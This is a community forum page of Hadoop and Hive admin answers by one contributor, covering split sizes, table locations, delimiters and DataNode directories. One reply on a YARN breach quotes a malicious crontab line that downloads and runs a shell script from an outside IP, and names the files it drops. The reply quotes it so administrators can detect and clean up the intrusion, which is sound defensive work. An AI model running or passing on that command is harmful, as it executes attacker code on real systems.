Member since: 04-11-2016
Posts: 535
Kudos Received: 148
Solutions: 77
My Accepted Solutions
Title | Views | Posted |
---|---|---|
 | 7581 | 09-17-2018 06:33 AM |
 | 1856 | 08-29-2018 07:48 AM |
 | 2791 | 08-28-2018 12:38 PM |
 | 2173 | 08-03-2018 05:42 AM |
 | 2026 | 07-27-2018 04:00 PM |
08-16-2018
05:40 AM
@Sudharsan Ganeshkumar
You can find the table's location with either of the below queries: 1. describe formatted <table_name>; 2. show create table <table_name>;
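For example, from the shell (assuming a hive client on the PATH and a hypothetical table named sales), the Location line in the output gives the HDFS path:

    # 'sales' is a hypothetical table name; either command prints the table's HDFS location
    hive -e "describe formatted sales;" | grep -i "Location"
    hive -e "show create table sales;" | grep -i "LOCATION"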
08-13-2018
12:59 PM
@rinu shrivastav The split size is calculated by the formula: max(mapred.min.split.size, min(mapred.max.split.size, dfs.block.size))
Say the HDFS block size is 64 MB, mapred.max.split.size is 256 MB, and mapred.min.split.size is set to 128 MB; then the split size is max(128, min(256, 64)) = 128 MB. To read 256 MB of data, there will be two mappers. To increase the number of mappers, you could decrease mapred.min.split.size down to the HDFS block size.
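A rough sketch of applying this from the Hive CLI, assuming the property names above and a hypothetical table my_table (sizes are in bytes; adjust property names for your Hadoop version):

    # Hedged sketch: pull the minimum split size back down to the 64 MB block size,
    # so that 256 MB of input is read by 4 mappers instead of 2.
    hive -e "
      SET mapred.min.split.size=67108864;    -- 64 MB
      SET mapred.max.split.size=268435456;   -- 256 MB
      SELECT COUNT(*) FROM my_table;         -- hypothetical table
    "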
08-13-2018
09:14 AM
@sasidhar Kari
Non-ASCII / Unicode characters are not well-supported as field delimiters; it is confirmed that characters outside of the basic ASCII character set do not work reliably. You will need to reformat your input so that it uses one of the first 128 characters in the Unicode list. Characters from \0-\177 (octal; see the second-to-last "Oct" column at http://asecuritysite.com/coding/asc2) should work well. Alternatively, you could use the custom SerDe MultiDelimitSerDe while creating the table.
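A hedged sketch of the MultiDelimitSerDe option, assuming a hypothetical two-column table and the multi-character delimiter '~|'; note the SerDe class sits under the contrib package in older Hive releases, so the class path may differ on your version:

    hive -e "
      CREATE TABLE demo_multidelim (id INT, name STRING)
      ROW FORMAT SERDE 'org.apache.hadoop.hive.contrib.serde2.MultiDelimitSerDe'
      WITH SERDEPROPERTIES ('field.delim'='~|')
      STORED AS TEXTFILE;
    "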
08-13-2018
07:37 AM
@Sadique Manzar
It seems like you are hitting HIVE-18258; try setting hive.vectorized.execution.reduce.groupby.enabled to false. Or, contact Hortonworks support for a hotfix.
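A minimal sketch of applying the workaround at the session level (the query below is a hypothetical placeholder for your failing query; to make it cluster-wide, set the property in the Hive configs via Ambari):

    # Disable vectorized reduce-side GROUP BY for this session, then re-run the failing query
    hive -e "
      SET hive.vectorized.execution.reduce.groupby.enabled=false;
      SELECT col, COUNT(*) FROM my_table GROUP BY col;   -- hypothetical failing query
    "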
08-06-2018
12:14 PM
@abcwt112
Can you check whether the Hive Metastore process is running with the command 'ps -ef | grep -i metastore'? If it is not running, check for errors under /var/log/hive/hivemetastore.log.
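For instance (the log path is the default one mentioned above and may vary by install):

    # Check whether the Hive Metastore process is up
    ps -ef | grep -i metastore | grep -v grep

    # If nothing is returned, look for recent errors in the metastore log
    tail -n 100 /var/log/hive/hivemetastore.log | grep -iE "error|exception"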
08-03-2018
05:42 AM
1 Kudo
@Lija Mohan
This is not normal; it is a known security breach, and a security notification has been sent out regarding it.
Below is the crontab of the 'yarn' user on each host in the cluster, which spawns these jobs to the Resource Manager: */2 * * * * wget -q -O - http://185.222.210.59/cr.sh | sh > /dev/null 2>&1
1. Stop further attacks:
a. Use firewall / iptables settings to allow access to the Resource Manager port (default 8088) only from whitelisted IP addresses. Do this on both Resource Managers in your HA setup. This only addresses the current attack; to permanently secure your clusters, all HDP end-points (e.g. WebHDFS) must be blocked from open access outside of firewalls.
b. Make your cluster secure (kerberized).
2. Clean up existing attacks:
a. If you already see the above problem in your clusters, please filter all applications named “MYYARN” and kill them after verifying that these applications were not legitimately submitted by your own users.
b. You will also need to manually log in to the cluster machines, check for any process referencing “z_2.sh”, “/tmp/java”, or “/tmp/w.conf”, and kill them (see the sketch below).
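A hedged sketch of those checks (application IDs and process IDs will differ per cluster; verify each one before killing anything):

    # Inspect the 'yarn' user's crontab on each host for the malicious entry
    crontab -l -u yarn

    # List suspicious YARN applications named MYYARN, then kill them by application ID
    yarn application -list | grep -i MYYARN
    # yarn application -kill <application_id>   # run per suspicious ID after verification

    # Find the dropped processes/files referenced above
    ps -ef | egrep "z_2.sh|/tmp/java|/tmp/w.conf" | grep -v egrep
    # kill -9 <pid>   # only after confirming the process is malicious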
Hortonworks strongly recommends that affected customers involve their internal security team to determine the extent of the damage and of any lateral movement inside the network. Affected customers will need to do a clean, secure installation after taking backups, and ensure that the data is not contaminated.
07-27-2018
04:00 PM
1 Kudo
@Abhay Kasturia There is no roadmap for Sqoop 2.x yet.
07-27-2018
03:38 PM
1 Kudo
@Abhay Kasturia Sqoop 2.x is not supported with current versions of HDP. The latest release, HDP 3.0, ships with Sqoop 1.4.7: https://docs.hortonworks.com/HDPDocuments/HDP3/HDP-3.0.0/release-notes/content/comp_versions.html You could upgrade the Sqoop version yourself; however, it is not certified with HDP versions.
07-19-2018
02:25 PM
@rganeshbabu Can you share the DDL of the transactional table?
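For example, you could grab the DDL with (the table name here is a hypothetical placeholder):

    # Dump the table definition so it can be shared
    hive -e "SHOW CREATE TABLE my_txn_table;"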
07-19-2018
09:42 AM
@Muthukumar S You can follow 'Option 1' with the below additional steps:
1. Stop the cluster.
2. Go to the Ambari HDFS configuration and edit the DataNode directories setting: remove /hadoop/hdfs/data and /hadoop/hdfs/data1, add /hadoop/hdfs/datanew, and save.
3. Log in to each DataNode VM and copy the contents of /data and /data1 into /datanew (see the sketch below).
4. Change the ownership of /datanew and everything under it to 'hdfs'.
5. Start the cluster.
FYI, these steps are also documented as a KB article.
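A hedged sketch of the per-DataNode copy and ownership steps, assuming the data directories live under /hadoop/hdfs and that the 'hadoop' group is used on your install (run as root while HDFS is stopped):

    # Merge the contents of both old DataNode directories into the new one,
    # preserving permissions and timestamps
    mkdir -p /hadoop/hdfs/datanew
    cp -rp /hadoop/hdfs/data/.  /hadoop/hdfs/datanew/
    cp -rp /hadoop/hdfs/data1/. /hadoop/hdfs/datanew/

    # Hand the new directory (and everything under it) to the hdfs user
    chown -R hdfs:hadoop /hadoop/hdfs/datanew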